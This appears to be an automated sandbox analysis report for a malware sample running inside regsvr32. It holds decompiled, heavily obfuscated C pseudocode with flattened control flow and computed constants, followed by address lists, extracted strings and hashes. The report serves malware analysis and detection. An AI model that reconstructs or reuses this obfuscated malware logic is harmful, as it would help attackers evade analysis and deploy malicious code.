								_v300 = 0x396da4;
								_v300 = _v300 + 0xd2a7;
								_v300 = _v300 << 3;
								_v300 = _v300 >> 0xd;
								_v300 = _v300 ^ 0x0006fc50;
								_v308 = 0xf5607b;
								_v308 = _v308 | 0x6377205d;
								_v308 = _v308 >> 0xd;
								_v308 = _v308 ^ 0x8ee5226d;
								_v308 = _v308 ^ 0x8eef49fe;
								_v304 = 0x626f36;
								_v304 = _v304 + 0xffffc8e1;
								_v304 = _v304 ^ 0x00638ef7;
								_v312 = 0x57338f;
								_v312 = _v312 + 0xeb04;
								_t172 =  &_v312;
								 *_t172 = _v312 ^ 0x0054b53e;
								__eflags =  *_t172;
								E003C79D0(_v300, _v308, __eflags, _v304, _v268, _v312);
								_t539 = _t539 + 0xc;
								L19:
								_t421 = 0x290aa;
								continue;
							}
							if(_t421 == 0x6455) {
								goto L13;
							}
							if(_t421 == 0x1bac4) {
								_v308 = 0x3c9eaa;
								_v308 = _v308 + 0x44ac;
								_t496 = 0x34;
								_v308 = _v308 * 0x23;
								_v308 = _v308 + 0xffff1890;
								_v308 = _v308 ^ 0x08512721;
								_v312 = 0xa1f753;
								_v312 = _v312 + 0xffff3683;
								_v312 = _v312 / _t496;
								_v312 = _v312 ^ 0x0008096e;
								_v304 = 0x14307f;
								_v304 = _v304 * 0x1e;
								_v304 = _v304 ^ 0x02535a03;
								_t471 = E003CD0F7(_a4, _v308, _v312, _v304,  &_v268);
								_t539 = _t539 + 0xc;
								__eflags = _t471;
								if(__eflags == 0) {
									_t534 = 0x6455;
								} else {
									_t534 = 0xb8dd0;
									_t481 = 1;
								}
								_t421 = 0x573d;
								continue;
							} else {
								_t547 = _t421 - 0x290aa;
								if(_t421 == 0x290aa) {
									_v296 = 0x2676c9;
									_v296 = _v296 | 0x247a685d;
									_t13 =  &_v296; // 0x247a685d
									_t498 = 0x44;
									_v296 =  *_t13 / _t498;
									_v296 = _v296 ^ 0x00877680;
									_v304 = 0x17835b;
									_t499 = 0x42;
									_v304 = _v304 * 0x69;
									_v304 = _v304 + 0xc6c0;
									_v304 = _v304 ^ 0x09accbdd;
									_v312 = 0xf631eb;
									_v312 = _v312 >> 1;
									_v312 = _v312 / _t499;
									_v312 = _v312 ^ 0x000495bf;
									_v292 = 0xb65182;
									_v292 = _v292 ^ 0x404b24db;
									_v292 = _v292 ^ 0x40fe1a29;
									E003C79D0(_v296, _v304, _t547, _v312, _v284, _v292);
									_v304 = 0x8ab21c;
									_v304 = _v304 + 0xbf9;
									_v304 = _v304 ^ 0x008cf0ba;
									_v312 = 0xf881b6;
									_v312 = _v312 >> 1;
									_v312 = _v312 ^ 0x007072c4;
									_v308 = 0x2a9439;
									_v308 = _v308 + 0xffffbc52;
									_v308 = _v308 | 0xfcbbf7fe;
									_v308 = _v308 ^ 0xfcb89741;
									_v300 = 0xbc217e;
									_v300 = _v300 << 3;
									_v300 = _v300 | 0x76b2efff;
									_v300 = _v300 ^ 0x77f51b8e;
									E003C79D0(_v304, _v312, _t547, _v308, _t535, _v300);
									_v304 = 0x2401c9;
									_v304 = _v304 ^ 0xab4a60e5;
									_v304 = _v304 + 0xfffff509;
									_v304 = _v304 ^ 0xab6ef353;
									_v308 = 0xeb8f98;
									_v308 = _v308 + 0x62b1;
									_v308 = _v308 >> 7;
									_v308 = _v308 | 0x8a87eb0e;
									_v308 = _v308 ^ 0x8a8990dd;
									_v312 = 0x6e0055;
									_v312 = _v312 * 0x4e;
									_v312 = _v312 ^ 0xe93eae9d;
									_v312 = _v312 ^ 0xc8bd0649;
									_v296 = 0x3042a8;
									_v296 = _v296 ^ 0x496881f0;
									_v296 = _v296 ^ 0x4951ea88;
									E003C79D0(_v304, _v308, _t547, _v312, _v276, _v296);
									_t539 = _t539 + 0x24;
									_t421 = _t534;
								}
								break;
							}
							L26:
							__eflags = _t421 - 0x5b922;
							if(_t421 == 0x5b922) {
								_v296 = 0xdb6b28;
								_v296 = _v296 ^ 0x4a3ea3e7;
								_v296 = _v296 ^ 0x4ae5c8ce;
								_v288 = 0x7f1abe;
								_t484 = 7;
								_push(_t484);
								_v288 = _v288 / _t484;
								_v288 = _v288 ^ 0x00122824;
								_v304 = 0xe9bc00;
								_v304 = _v304 + 0x7229;
								_v304 = _v304 >> 8;
								_v304 = _v304 ^ 0x000e1d35;
								_v312 = 0x24cbb4;
								_v312 = _v312 >> 8;
								_v312 = _v312 | 0x0e591251;
								_v312 = _v312 ^ 0x0e56dc06;
								_t426 = E003C2B6C(_v296, _v288);
								_v288 = 0x336f9e;
								_v288 = _v288 << 0xe;
								_v288 = _v288 ^ 0xdbe281fb;
								_v300 = 0xb12077;
								_v300 = _v300 << 4;
								_v300 = _v300 ^ 0x936bedab;
								_v300 = _v300 + 0xffff93f9;
								_v300 = _v300 ^ 0x987a2113;
								_v308 = 0x4d3773;
								_t363 =  &_v308; // 0x4d3773
								_t537 = 0x11;
								_v308 =  *_t363 * 0x31;
								_t365 =  &_v308; // 0x4d3773
								_v308 =  *_t365 * 0x34;
								_t367 =  &_v308; // 0x4d3773
								_v308 =  *_t367 * 0x1b;
								_v308 = _v308 ^ 0x0ec75c31;
								_v292 = 0x4e0394;
								_v292 = _v292 / _t537;
								_v292 = _v292 << 0xf;
								_v292 = _v292 + 0xffffdf25;
								_v292 = _v292 ^ 0x4b69f19a;
								_v312 = 0x4f65b2;
								_v312 = _v312 + 0xffffd74a;
								_v312 = _v312 >> 0xa;
								_v312 = _v312 ^ 0xfc18c610;
								_v312 = _v312 ^ 0xfc18d5d7;
								_v304 = 0x255d0e;
								_v304 = _v304 ^ 0xa0c9bdbe;
								_v304 = _v304 * 0x71;
								_v304 = _v304 | 0x2cb66901;
								_v304 = _v304 ^ 0x2cbf6db0;
								_v296 = 0xa0e804;
								_v296 = _v296 << 7;
								_v296 = _v296 + 0x7e7d;
								_v296 = _v296 << 4;
								_v296 = _v296 ^ 0x074807d2;
								E003CAF67(_v288, _v296 | _v304 | _v312,  &_v260, _v300, _t426, _v308, _v292);
								_t539 = _t539 + 0x1c;
								_t421 = 0xa3254;
								_t536 = 0;
								__eflags = 0;
								break;
							}
							__eflags = _t421 - 0x6247a;
							if(_t421 == 0x6247a) {
								_v288 = 0x66aeed;
								_v288 = _v288 + 0xffff99b6;
								_v288 = _v288 ^ 0x0061bce5;
								_t535 = _t536;
								_v312 = 0x730b0;
								_v312 = _v312 >> 7;
								_v312 = _v312 >> 0xb;
								_v312 = _v312 ^ 0x00040192;
								E003D2AEF(0x100, _v288,  &_v260, _v312);
								_v276 = _t536;
								_t421 = 0xd6b87;
								_v272 = _t536;
								_v284 = _t536;
								_v280 = _t536;
								continue;
							}
							__eflags = _t421 - 0xa3254;
							if(_t421 == 0xa3254) {
								_v296 = 0x38d8c;
								_v296 = _v296 * 0x3d;
								_v296 = _v296 ^ 0x5d3bc516;
								_v296 = _v296 ^ 0x5de9085c;
								_v288 = 0x706ccc;
								_v288 = _v288 | 0x708fcf3f;
								_v288 = _v288 ^ 0x70ff8e05;
								_v304 = 0x5024ad;
								_v304 = _v304 >> 3;
								_v304 = _v304 | 0x1f850a30;
								_v304 = _v304 ^ 0x1f8dfc14;
								_v300 = 0xa489e;
								_v300 = _v300 + 0x4d1;
								_v300 = _v300 ^ 0x000688fe;
								_v312 = 0x6efdc4;
								_v312 = _v312 | 0xa7652931;
								_v312 = _v312 >> 4;
								_v312 = _v312 ^ 0x0a715d6a;
								_v308 = 0xa02b78;
								_v308 = _v308 + 0xffffbe71;
								_v308 = _v308 >> 2;
								_v308 = _v308 << 3;
								_v308 = _v308 ^ 0x01328349;
								_v292 = 0x2ae151;
								_v292 = _v292 * 0x59;
								_v292 = _v292 + 0xffff5e85;
								_v292 = _v292 * 0x1d;
								_v292 = _v292 ^ 0xb0305c13;
								_t441 =  *0x3e2210; // 0x0
								_t445 =  *0x3e2210; // 0x0
								_t450 = E003C9C3D(_v296, _t535, _v288, _v304, _v300,  &_v268,  &_v260,  *(_t445[0xb] + 0x2c) & 0x0000ffff, _v312, _v308,  &_v276,  *(_t441[0xb] + 0x50) & 0x0000ffff, _t441[0xb] + 4, _v292);
								_t539 = _t539 + 0x30;
								__eflags = _t450;
								if(__eflags == 0) {
									_t534 = 0x6455;
									goto L19;
								}
								_t421 = 0x1bac4;
								continue;
							}
							__eflags = _t421 - 0xd6b87;
							if(__eflags != 0) {
								break;
							}
							_v292 = 0x9a8711;
							_t503 = 0x7b;
							_v292 = _v292 / _t503;
							_v292 = _v292 | 0x523c0eef;
							_v292 = _v292 + 0xffff929e;
							_v292 = _v292 ^ 0x523fd9e4;
							_v300 = 0x1b4d75;
							_v300 = _v300 | 0x4a939ff7;
							_v300 = _v300 * 0x6b;
							_v300 = _v300 * 0x34;
							_v300 = _v300 ^ 0x93d81f31;
							_v308 = 0x48b409;
							_v308 = _v308 * 5;
							_v308 = _v308 >> 7;
							_v308 = _v308 >> 4;
							_v308 = _v308 ^ 0x000cf319;
							_v312 = 0x309df8;
							_v312 = _v312 * 0x5b;
							_v312 = _v312 ^ 0x114fc4f5;
							_t458 = E003C323D(_a12, _v292, _v300, _v308,  &_v284, _a8, _v312);
							_t539 = _t539 + 0x14;
							__eflags = _t458;
							if(__eflags == 0) {
								L17:
								return _t481;
							}
							_t421 = 0x4dea1;
						}
					} while (_t421 != 0xb8dd0);
					goto L17;
					L13:
					_t495 =  *0x3e2210; // 0x0
					_t463 =  *(_t495[0xb] + 0x58);
					 *_t495 =  *_t495 + 1;
					_t518 =  *_t495;
					_t495[0xb] = _t463;
					__eflags = _t463 - _t536;
					if(_t463 == _t536) {
						_t495[0xb] = _t495[8];
					}
					_t464 =  *0x3e2210; // 0x0
					__eflags = _t518 - _t464[0xc];
				} while (__eflags < 0);
				 *_t464 = _t536;
				goto L17;
			}

0x003d6ba2
0x003d6ba9
0x003d6bb0
0x003d6bb7
0x003d6bbe
0x003d6bc5
0x003d6bcc
0x003d6bcd
0x003d6bce
0x003d6bd3
0x003d6bd6
0x003d6be2
0x003d6be4
0x003d6be8
0x003d6bea
0x003d6bea
0x003d6bea
0x003d6bef
0x003d6bef
0x003d6bef
0x003d6bef
0x003d6bf4
0x003d6bf4
0x003d6bfa
0x003d6bfa
0x003d6f6d
0x003d6f79
0x003d6f81
0x003d6f86
0x003d6f92
0x003d6f96
0x003d6fa3
0x003d6f98
0x003d6f98
0x003d6f98
0x003d6fa8
0x003d6faa
0x003d6fac
0x003d6fb8
0x003d6fae
0x003d6fae
0x003d6fae
0x003d6bef
0x003d6bef
0x003d6bef
0x003d6bf4
0x003d6bf4
0x00000000
0x003d6bf4
0x00000000
0x003d6bef
0x003d6c05
0x003d6ed0
0x003d6ed8
0x003d6ee0
0x003d6ee5
0x003d6eea
0x003d6ef2
0x003d6efa
0x003d6f02
0x003d6f07
0x003d6f0f
0x003d6f17
0x003d6f1f
0x003d6f27
0x003d6f2f
0x003d6f37
0x003d6f3f
0x003d6f3f
0x003d6f3f
0x003d6f5b
0x003d6f60
0x003d6f63
0x003d6f63
0x00000000
0x003d6f63
0x003d6c10
0x00000000
0x00000000
0x003d6c1b
0x003d6dee
0x003d6df8
0x003d6e07
0x003d6e08
0x003d6e0c
0x003d6e14
0x003d6e1c
0x003d6e24
0x003d6e39
0x003d6e3d
0x003d6e45
0x003d6e52
0x003d6e5a
0x003d6e6f
0x003d6e74
0x003d6e77
0x003d6e79
0x003d6e85
0x003d6e7b
0x003d6e7d
0x003d6e82
0x003d6e82
0x003d6e8a
0x00000000
0x003d6c21
0x003d6c21
0x003d6c26
0x003d6c2c
0x003d6c36
0x003d6c3e
0x003d6c44
0x003d6c49
0x003d6c4f
0x003d6c57
0x003d6c64
0x003d6c65
0x003d6c69
0x003d6c71
0x003d6c79
0x003d6c81
0x003d6c8b
0x003d6c8f
0x003d6c97
0x003d6c9f
0x003d6ca7
0x003d6cc3
0x003d6cc8
0x003d6cd3
0x003d6cdb
0x003d6ce3
0x003d6ceb
0x003d6cef
0x003d6cf7
0x003d6cff
0x003d6d07
0x003d6d0f
0x003d6d17
0x003d6d1f
0x003d6d24
0x003d6d2c
0x003d6d45
0x003d6d4a
0x003d6d55
0x003d6d5d
0x003d6d65
0x003d6d6d
0x003d6d75
0x003d6d7d
0x003d6d82
0x003d6d8a
0x003d6d92
0x003d6d9f
0x003d6da3
0x003d6dab
0x003d6db3
0x003d6dbb
0x003d6dc3
0x003d6ddf
0x003d6de4
0x003d6de7
0x003d6de7
0x00000000
0x003d6c26
0x003d6fc7
0x003d6fc7
0x003d6fcc
0x003d726e
0x003d7278
0x003d7280
0x003d7288
0x003d7296
0x003d7299
0x003d729a
0x003d729e
0x003d72a6
0x003d72ae
0x003d72b6
0x003d72bb
0x003d72c3
0x003d72cb
0x003d72d0
0x003d72d8
0x003d72f0
0x003d72f5
0x003d72ff
0x003d7306
0x003d730e
0x003d7316
0x003d731b
0x003d7323
0x003d732b
0x003d7333
0x003d733b
0x003d7342
0x003d7343
0x003d7347
0x003d734c
0x003d7350
0x003d7355
0x003d7359
0x003d7361
0x003d736f
0x003d7373
0x003d7378
0x003d7380
0x003d7388
0x003d7390
0x003d7398
0x003d739d
0x003d73a5
0x003d73ad
0x003d73b5
0x003d73c2
0x003d73ca
0x003d73d2
0x003d73da
0x003d73e2
0x003d73e7
0x003d73ef
0x003d73f4
0x003d741a
0x003d741f
0x003d7422
0x003d7427
0x003d7427
0x00000000
0x003d7427
0x003d6fd2
0x003d6fd7
0x003d7207
0x003d7213
0x003d7220
0x003d7228
0x003d722a
0x003d7232
0x003d7237
0x003d723c
0x003d724d
0x003d7254
0x003d7258
0x003d725d
0x003d7261
0x003d7265
0x00000000
0x003d7265
0x003d6fdd
0x003d6fe2
0x003d70c5
0x003d70d4
0x003d70d8
0x003d70e0
0x003d70e8
0x003d70f0
0x003d70f8
0x003d7100
0x003d7108
0x003d710d
0x003d7115
0x003d711d
0x003d7125
0x003d712d
0x003d7135
0x003d713d
0x003d7145
0x003d714a
0x003d7152
0x003d715a
0x003d7162
0x003d7167
0x003d716c
0x003d7174
0x003d7181
0x003d7185
0x003d7192
0x003d7196
0x003d71a2
0x003d71c0
0x003d71e7
0x003d71ec
0x003d71ef
0x003d71f1
0x003d71fd
0x00000000
0x003d71fd
0x003d71f3
0x00000000
0x003d71f3
0x003d6fe8
0x003d6fed
0x00000000
0x00000000
0x003d6ff3
0x003d7003
0x003d700d
0x003d7011
0x003d7019
0x003d7021
0x003d7029
0x003d7031
0x003d703e
0x003d7047
0x003d704b
0x003d7053
0x003d7060
0x003d7064
0x003d7069
0x003d706e
0x003d7076
0x003d7083
0x003d708b
0x003d70ab
0x003d70b0
0x003d70b3
0x003d70b5
0x003d6ec6
0x003d6ecf
0x003d6ecf
0x003d70bb
0x003d70bb
0x003d7429
0x00000000
0x003d6e94
0x003d6e94
0x003d6e9d
0x003d6ea0
0x003d6ea2
0x003d6ea4
0x003d6ea7
0x003d6ea9
0x003d6eae
0x003d6eae
0x003d6eb1
0x003d6eb6
0x003d6eb6
0x003d6ec1
0x00000000

Strings

s7M, xrefs: 003D733B
T2, xrefs: 003D6FDD
]hz$, xrefs: 003D6C3E
T2, xrefs: 003D7422
}~, xrefs: 003D73E7
6ob, xrefs: 003D6F17
] wc, xrefs: 003D6EFA
j]q, xrefs: 003D714A
Q*, xrefs: 003D7174

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6ob$Q*$T2$T2$] wc$]hz$$j]q$s7M$}~
API String ID: 0-3098667723
Opcode ID: eebe42584bdebf43a81a2702dceab99d94fa11899e519fbe8c9d6d5933cc12ed
Instruction ID: ea404763b0617ac67aa461603c99e2d6789a48eb8c44ce050e4ff0b906598f57
Opcode Fuzzy Hash: eebe42584bdebf43a81a2702dceab99d94fa11899e519fbe8c9d6d5933cc12ed
Instruction Fuzzy Hash: 562211714083418FC349CF25E58A80BBBE1FBD8758F104A1EF599AA261D774DA49CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 003D1DCF Relevance: 11.7, Strings: 9, Instructions: 415
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003D1DCF() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				char _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				void* _t442;
				void* _t446;
				void* _t474;
				void* _t484;
				void* _t492;
				signed int _t493;
				intOrPtr _t494;
				intOrPtr* _t495;
				intOrPtr _t497;
				signed int _t498;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed int _t505;
				signed int _t507;
				void* _t550;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int* _t558;

				_t558 =  &_v1100;
				_v1056 = 0xde172;
				_v1052 = 0x5da43;
				_t550 = 0x234d6;
				_v1064 = 0;
				_t493 = _v1064;
				_v1048 = 0x73a3b;
				_v1044 = 0xcf95d;
				_t557 = 0x5c;
				while(1) {
					L1:
					_t442 = 0xf86eb;
					do {
						L2:
						if(_t550 == 0x15113) {
							_v1096 = 0x5135ea;
							_v1096 = _v1096 >> 5;
							_v1096 = _v1096 / _t557;
							_v1096 = _v1096 ^ 0x000638c2;
							_v1100 = 0xe6412a;
							_v1100 = _v1100 << 3;
							_v1100 = _v1100 + 0xffff40b3;
							_v1100 = _v1100 >> 0xf;
							_v1100 = _v1100 ^ 0x0001f1d5;
							_v1092 = 0x41264c;
							_v1092 = _v1092 * 0x69;
							_v1092 = _v1092 + 0xffffe374;
							_v1092 = _v1092 ^ 0x1ab655f7;
							_v1088 = 0x1b104f;
							_v1088 = _v1088 ^ 0x699df144;
							_v1088 = _v1088 ^ 0x69814dd4;
							_t446 = E003CD933(_v1096, _v1100, 0x3c1020, _v1092, _v1088);
							_v1096 = 0x8b917e;
							_v1096 = _v1096 >> 1;
							_v1096 = _v1096 | 0xe5ac3658;
							_v1096 = _v1096 ^ 0xc3adbd45;
							_v1096 = _v1096 ^ 0x264519a9;
							_v1092 = 0xe6ce3d;
							_v1092 = _v1092 >> 2;
							_v1092 = _v1092 << 9;
							_v1092 = _v1092 ^ 0x7365b48f;
							_v1088 = 0xd4c226;
							_v1088 = _v1088 | 0xcb4898f4;
							_v1088 = _v1088 ^ 0xcbdca2ee;
							_v1100 = 0xf487a6;
							_v1100 = _v1100 >> 4;
							_v1100 = _v1100 * 0x6f;
							_v1100 = _v1100 + 0xffff53ee;
							_v1100 = _v1100 ^ 0x069dfec5;
							_t497 =  *0x3e2208; // 0x28e510
							_t365 = _t497 + 0x1c; // 0x28e52c
							_t366 = _t497 + 0x22c; // 0x28e73c
							_t369 =  &_v1088; // 0xde172
							E003C2388(_v1096,  &_v1040, _v1092,  *_t369, _t446,  &_v520, _v1100, _t366, _t365);
							_v1088 = 0x951279;
							_v1088 = _v1088 << 4;
							_v1088 = _v1088 ^ 0x09520935;
							_v1096 = 0x59c25d;
							_t498 = 0x2f;
							_v1096 = _v1096 * 0x3e;
							_v1096 = _v1096 * 0x56;
							_v1096 = _v1096 + 0xffffdd2b;
							_v1096 = _v1096 ^ 0x4d8cde0c;
							_v1100 = 0x3a09f6;
							_v1100 = _v1100 + 0xb848;
							_v1100 = _v1100 / _t498;
							_v1100 = _v1100 | 0x1dad8e1b;
							_v1100 = _v1100 ^ 0x1da0cee7;
							E003C43D3(_v1088, _v1096, _v1100, _t446);
							_t558 =  &(_t558[0xd]);
							_t550 = 0xee4c6;
							goto L16;
						} else {
							if(_t550 == 0x234d6) {
								_v1072 = 0x946b23;
								_v1072 = _v1072 | 0x0f410cc0;
								_v1072 = _v1072 ^ 0x0fd56fca;
								_v1068 = 0x85d279;
								_t500 = 0x4a;
								_v1068 = _v1068 / _t500;
								_v1068 = _v1068 ^ 0x000c6041;
								_v1088 = 0xb52257;
								_v1088 = _v1088 >> 2;
								_v1088 = _v1088 ^ 0x0024ab9f;
								_v1096 = 0x7abf85;
								_v1096 = _v1096 + 0xffff661d;
								_v1096 = _v1096 ^ 0x0c9ac4ba;
								_v1096 = _v1096 ^ 0x0ce2764f;
								_v1092 = 0xbe5831;
								_v1092 = _v1092 >> 7;
								_v1092 = _v1092 ^ 0x01ea39a8;
								_v1092 = _v1092 ^ 0x01ec41b9;
								_v1100 = 0x5aa49b;
								_t501 = 0x53;
								_v1100 = _v1100 / _t501;
								_t502 = 0x6a;
								_v1100 = _v1100 / _t502;
								_t503 = 0x26;
								_push(_t503);
								_v1100 = _v1100 / _t503;
								_v1100 = _v1100 ^ 0x00010f3d;
								_push(_t503);
								E003CD5B0(_v1072,  &_v520, _v1068, _v1088, _v1096, _v1092, _t503, _v1100);
								_t558 =  &(_t558[8]);
								_t550 = 0x15113;
								goto L1;
							} else {
								if(_t550 == 0x47a8d) {
									_v1100 = 0xf25d6e;
									_t505 = 0x48;
									_v1100 = _v1100 / _t505;
									_v1100 = _v1100 + 0xee4b;
									_v1100 = _v1100 ^ 0x6fe4c7d8;
									_v1100 = _v1100 ^ 0x6fee831a;
									_v1088 = 0x22a1af;
									_v1088 = _v1088 | 0x55c6dfea;
									_v1088 = _v1088 ^ 0x55ebf008;
									_v1096 = 0x80f93d;
									_v1096 = _v1096 << 0xa;
									_v1096 = _v1096 << 0x10;
									_v1096 = _v1096 ^ 0xf4009086;
									_v1092 = 0xc4369a;
									_v1092 = _v1092 + 0xffffa9bb;
									_v1092 = _v1092 | 0xbd3a23b6;
									_v1092 = _v1092 ^ 0xbdf06ec2;
									E003D8401(_v1100, _v1088, _v1096, _v1092, _v1060);
								} else {
									if(_t550 == 0xd12ae) {
										_v1096 = 0x8e5fe1;
										_v1096 = _v1096 << 2;
										_v1096 = _v1096 + 0x19b6;
										_v1096 = _v1096 | 0x3523f1e0;
										_v1096 = _v1096 ^ 0x373b2108;
										_v1092 = 0x1a3d7d;
										_v1092 = _v1092 | 0x8a0788f1;
										_v1092 = _v1092 ^ 0x8a1371a4;
										_v1076 = 0x42f7ed;
										_v1076 = _v1076 >> 9;
										_v1076 = _v1076 ^ 0x0008540e;
										_v1100 = 0x996c69;
										_t507 = 0x5d;
										_v1100 = _v1100 / _t507;
										_v1100 = _v1100 * 0x72;
										_v1100 = _v1100 | 0x3525662c;
										_v1100 = _v1100 ^ 0x35b5d1ab;
										_t474 = E003CD933(_v1096, _v1092, 0x3c1050, _v1076, _v1100);
										_v1072 = 0xbadd1d;
										_v1072 = _v1072 + 0x1439;
										_v1072 = _v1072 ^ 0x80baf157;
										_v1096 = 0x6f86d5;
										_v1096 = _v1096 ^ 0x7ca26995;
										_v1096 = _v1096 >> 9;
										_v1096 = _v1096 ^ 0x003e66f5;
										_v1088 = 0x8bc4aa;
										_v1088 = _v1088 + 0x87;
										_v1088 = _v1088 ^ 0x008c8302;
										_v1092 = 0xd6da7;
										_v1092 = _v1092 | 0xb284b012;
										_v1092 = _v1092 << 0xa;
										_v1092 = _v1092 ^ 0x37fffc87;
										_v1068 = 0x2d1144;
										_v1068 = _v1068 * 0x7c;
										_v1068 = _v1068 ^ 0x15dde044;
										_v1076 = 0x387e05;
										_v1076 = _v1076 + 0xffff77c5;
										_v1076 = _v1076 ^ 0x00324823;
										_v1100 = 0xcf82be;
										_v1100 = _v1100 + 0x9f18;
										_v1100 = _v1100 * 0x44;
										_v1100 = _v1100 | 0x86ca0cea;
										_v1100 = _v1100 ^ 0xb7c26acf;
										_v1084 = 0xaf7b38;
										_v1084 = _v1084 + 0xfffff213;
										_v1084 = _v1084 + 0xffff3237;
										_v1084 = _v1084 ^ 0x00a75e05;
										_v1080 = 0xfbe8bb;
										_v1080 = _v1080 + 0x86c3;
										_v1080 = _v1080 ^ 0xceb073b3;
										_v1080 = _v1080 ^ 0xce40bdb1;
										E003D98FB(_v1088, _v1096, _v1096, _v1092,  &_v1060, _v1068, _v1072, _v1076, _t474, _v1100, _v1084, _v1096, _v1080, _v1096);
										_v1100 = 0x91f7da;
										_t550 =  ==  ? 0xf86eb : 0xa5283;
										_v1100 = _v1100 * 0x2f;
										_v1100 = _v1100 >> 0xc;
										_v1100 = _v1100 ^ 0x1fe7f7b6;
										_v1100 = _v1100 ^ 0x1fe7dfc1;
										_v1092 = 0xc0ca03;
										_v1092 = _v1092 << 0xb;
										_v1092 = _v1092 * 0x19;
										_v1092 = _v1092 ^ 0x9dd9bd53;
										_v1088 = 0x1d8589;
										_v1088 = _v1088 >> 0xf;
										_v1088 = _v1088 ^ 0x00089f94;
										E003C43D3(_v1100, _v1092, _v1088, _t474);
										_t558 =  &(_t558[0x13]);
										L16:
										_t442 = 0xf86eb;
										goto L17;
									} else {
										if(_t550 == 0xee4c6) {
											_t494 =  *0x3e2208; // 0x28e510
											_t495 = _t494 + 0x22c;
											while( *_t495 != _t557) {
												_t495 = _t495 + 2;
											}
											_t493 = _t495 + 2;
											_t550 = 0xd12ae;
											while(1) {
												L1:
												_t442 = 0xf86eb;
												goto L2;
											}
										} else {
											if(_t550 != _t442) {
												goto L17;
											} else {
												_v1100 = 0x133302;
												_v1100 = _v1100 << 6;
												_v1100 = _v1100 >> 2;
												_v1100 = _v1100 ^ 0x01333021;
												_v1092 = 0xbed4c;
												_v1092 = _v1092 >> 0xf;
												_v1092 = _v1092 ^ 0x0000aa1b;
												_v1080 = 0x35ba8d;
												_v1080 = _v1080 >> 0x10;
												_v1080 = _v1080 | 0x0b645b03;
												_v1080 = _v1080 + 0x4631;
												_v1080 = _v1080 ^ 0x0b6141ad;
												_v1084 = 0xa6b410;
												_v1084 = _v1084 ^ 0x1cd90b94;
												_v1084 = _v1084 + 0xd611;
												_v1084 = _v1084 + 0xffff5ba2;
												_v1084 = _v1084 ^ 0x1c7c0bab;
												_t484 = E003CB10B(_v1092, _v1080, _v1084,  &_v1040);
												_v1100 = 0x51192;
												_v1100 = _v1100 << 1;
												_v1100 = _v1100 >> 0xd;
												_v1100 = _v1100 >> 5;
												_v1100 = _v1100 ^ 0x000e3950;
												_v1076 = 0x1a1164;
												_v1076 = _v1076 >> 7;
												_v1076 = _v1076 ^ 0x000bb0da;
												_v1096 = 0xb793cd;
												_v1096 = _v1096 ^ 0xafa27d17;
												_t554 = 0x2d;
												_v1096 = _v1096 / _t554;
												_v1096 = _v1096 << 8;
												_v1096 = _v1096 ^ 0xe402f06f;
												_v1092 = 0x6b8162;
												_v1092 = _v1092 + 0xffff3f6d;
												_v1092 = _v1092 ^ 0x00611a4d;
												_v1084 = 0x45c98f;
												_t555 = 0x6b;
												_v1084 = _v1084 / _t555;
												_v1084 = _v1084 >> 4;
												_v1084 = _v1084 | 0x00a40f96;
												_v1084 = _v1084 ^ 0x00a58f77;
												_v1080 = 0xb1dfb7;
												_t556 = 0x4d;
												_v1080 = _v1080 / _t556;
												_v1080 = _v1080 << 0xc;
												_v1080 = _v1080 >> 4;
												_v1080 = _v1080 ^ 0x02420473;
												_t492 = E003C4C65(_v1100, _v1076, _v1060, _t484 + _v1100 + _t484 + _v1100, _v1096, _v1092, _t493,  &_v1040, _t484 + _v1100 + _t484 + _v1100, _v1084, _t484 + _v1100 + _t484 + _v1100, _v1080);
												_t558 =  &(_t558[0xa]);
												_t550 = 0x47a8d;
												_v1064 = 0 | _t492 == 0x00000000;
												while(1) {
													L1:
													_t442 = 0xf86eb;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L20:
						return _v1064;
						L17:
					} while (_t550 != 0xa5283);
					goto L20;
				}
			}

0x003d1dcf
0x003d1dd9
0x003d1de3
0x003d1deb
0x003d1df0
0x003d1df4
0x003d1dfa
0x003d1e02
0x003d1e0a
0x003d1e0b
0x003d1e0b
0x003d1e0b
0x003d1e10
0x003d1e10
0x003d1e16
0x003d2374
0x003d237e
0x003d2389
0x003d238d
0x003d2395
0x003d239d
0x003d23a2
0x003d23aa
0x003d23af
0x003d23b7
0x003d23c4
0x003d23c8
0x003d23d0
0x003d23d8
0x003d23e0
0x003d23e8
0x003d2405
0x003d240a
0x003d2414
0x003d2418
0x003d2420
0x003d2428
0x003d2430
0x003d2438
0x003d243d
0x003d2442
0x003d244a
0x003d2452
0x003d245a
0x003d2462
0x003d246a
0x003d2474
0x003d2478
0x003d2480
0x003d2488
0x003d248e
0x003d2492
0x003d24a6
0x003d24b7
0x003d24bc
0x003d24c6
0x003d24cb
0x003d24d3
0x003d24e2
0x003d24e4
0x003d24ed
0x003d24f1
0x003d24f9
0x003d2501
0x003d2509
0x003d2517
0x003d251b
0x003d2523
0x003d2537
0x003d253c
0x003d253f
0x00000000
0x003d1e1c
0x003d1e22
0x003d227a
0x003d2284
0x003d228c
0x003d2294
0x003d22a2
0x003d22a7
0x003d22ad
0x003d22b5
0x003d22bd
0x003d22c2
0x003d22ca
0x003d22d2
0x003d22da
0x003d22e2
0x003d22ea
0x003d22f2
0x003d22f7
0x003d22ff
0x003d2307
0x003d2313
0x003d2318
0x003d2322
0x003d2327
0x003d2331
0x003d2334
0x003d2335
0x003d2340
0x003d2348
0x003d2362
0x003d2367
0x003d236a
0x00000000
0x003d1e28
0x003d1e2e
0x003d255a
0x003d256a
0x003d256d
0x003d2571
0x003d2579
0x003d2581
0x003d2589
0x003d2591
0x003d2599
